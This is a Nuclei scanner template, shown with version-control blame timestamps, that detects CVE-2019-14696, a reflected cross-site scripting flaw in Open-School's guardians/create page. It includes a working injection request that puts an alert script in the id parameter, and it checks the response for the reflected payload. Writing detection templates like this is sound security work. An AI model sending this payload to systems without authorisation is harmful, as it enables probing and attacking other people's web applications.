2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-14696
|
2020-09-04 15:46:07 +00:00
|
|
|
|
|
|
|
info:
|
2022-11-01 13:13:42 +00:00
|
|
|
name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
|
2020-09-04 15:46:07 +00:00
|
|
|
author: pikpikcu
|
2020-09-05 06:40:16 +00:00
|
|
|
severity: medium
|
2022-08-12 00:45:50 +00:00
|
|
|
description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://open-school.org
|
|
|
|
- https://pastebin.com/AgxqdbAQ
|
|
|
|
- http://packetstormsecurity.com/files/153984/Open-School-3.0-Community-Edition-2.3-Cross-Site-Scripting.html
|
2022-08-12 00:45:50 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-14696
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-14696
|
|
|
|
cwe-id: CWE-79
|
2022-11-01 13:13:42 +00:00
|
|
|
tags: cve,cve2019,xss,open-school
|
2020-09-04 15:46:07 +00:00
|
|
|
|
|
|
|
requests:
|
2020-09-17 09:58:51 +00:00
|
|
|
- method: GET
|
2020-09-04 15:46:07 +00:00
|
|
|
path:
|
2020-09-04 15:51:55 +00:00
|
|
|
- '{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
2020-09-04 15:46:07 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-11-01 13:13:42 +00:00
|
|
|
|
2020-09-04 15:46:07 +00:00
|
|
|
- type: word
|
2022-11-01 13:13:42 +00:00
|
|
|
part: body
|
2020-09-04 15:46:07 +00:00
|
|
|
words:
|
|
|
|
- '<script>alert(document.domain)</script>'
|
2022-11-01 13:13:42 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-08-12 00:45:50 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/08/08
|